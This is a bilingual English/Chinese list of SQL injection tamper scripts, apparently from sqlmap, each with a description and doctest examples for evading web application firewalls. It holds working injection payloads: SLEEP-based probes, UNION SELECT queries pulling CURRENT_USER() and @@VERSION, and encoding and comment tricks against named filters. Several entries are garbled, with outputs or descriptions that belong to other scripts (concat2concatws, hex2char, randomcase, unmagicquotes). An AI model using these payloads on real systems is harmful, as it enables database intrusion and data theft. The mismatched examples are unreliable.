>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
between.py
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
将 > 字符替换为 NOT BETWEEN 0 AND
将 = 字符替换为 BETWEEN # AND #
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
binary.py
Injects keyword binary where possible
Requirement:
MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
bluecoat.py
Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
将 sql 语句后的空格字符替换为 %09,LIKE 替换字符 =
Requirement:
Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
MySQL 5.1, SGOS
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
chardoubleencode.py
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
二次URL编码
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
charencode.py
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
URL编码
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
url 解码中的 % 换成 \\
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
commalesslimit.py
Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
替换字符的位置
Requirement:
MySQL
Tested against:
MySQL 5.0 and 5.5
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
commalessmid.py
Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
用 'MID(A FROM B FOR C)' 代替 'MID(A, B, C)'
Requirement:
MySQL
Tested against:
MySQL 5.0 and 5.5
>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'
commentbeforeparentheses.py
Prepends (inline) comment before parentheses (e.g. ( -> /**/()
在括号前添加内联注释
Tested against:
Microsoft SQL Server
MySQL
Oracle
PostgreSQL
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
concat2concatws.py
Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
>>> tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'
equaltolike.py
Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
将 = 换成 LIKE
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
equaltorlike.py
Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
将 = 换成 RLIKE
Tested against:
MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'
escapequotes.py
Slash escape single and double quotes (e.g. ' -> ')
>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
greatest.py
Replaces greater than operator ('>') with 'GREATEST' counterpart
使用 greatest 替换 >
Tested against:
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py
Adds (MySQL) versioned comment before each keyword
在每个关键词前添加(MySQL)的版本注释
Requirement:
MySQL < 5.1
Tested against:
MySQL 4.0.18, 5.0.22
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
hex2char.py
Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'
percentage.py
Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
在每一个字符前面添加一个百分比符号
Requirement:
ASP
Tested against:
Microsoft SQL Server 2000, 2005
MySQL 5.1.56, 5.5.11
PostgreSQL 9.0
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
plus2concat.py
Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
用对应的 (MsSQL) 函数 CONCAT() 代替加号运算符('+')。
Tested against:
Microsoft SQL Server 2012
Requirements:
Microsoft SQL Server 2012+
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'
plus2fnconcat.py
Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
randomcase.py
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
字符替换成大小写字符
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
SQLite 3
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'
space2mssqlblank.py
Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
将(MsSQL)空格字符('')的实例替换为一个有效的备用字符集中的随机空白字符。
Requirement:
Microsoft SQL Server
Tested against:
Microsoft SQL Server 2000
Microsoft SQL Server 2005
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'
space2mssqlhash.py
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
将空格替换成 %23%0A
Requirement:
MSSQL
MySQL
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py
Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
将(MySQL)空格字符('')的实例替换为有效替代字符集中的随机空白字符
Requirement:
MySQL
Tested against:
MySQL 5.1
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'
space2mysqldash.py
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
用注释('--')代替空格字符(''),后面是一个新行('/n')。
Requirement:
MySQL
MSSQL
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
space2plus.py
Replaces space character (' ') with plus ('+')
将空格替换成 +
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
space2randomblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
用一组有效的备用字符中的随机空白字符替换空格字符('')。
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
substring2leftright.py
Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
用 LEFT 和 RIGHT 取代 PostgreSQL 的 SUBSTRING
Tested against:
PostgreSQL 9.6.12
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
symboliclogical.py
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
将 and 和 or 的逻辑运算符分别替换为 (&& 和 ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
unionalltonnion.py
Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
将 union all select 替换成 union select
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
unmagicquotes.py
Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
Encloses each non-function keyword with (MySQL) versioned comment
Requirement:
MySQL
Tested against:
MySQL 4.0.18, 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py
Encloses each keyword with (MySQL) versioned comment
Requirement:
MySQL >= 5.1.13
Tested against:
MySQL 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py
Append a fake HTTP header 'X-Forwarded-For' (and alike)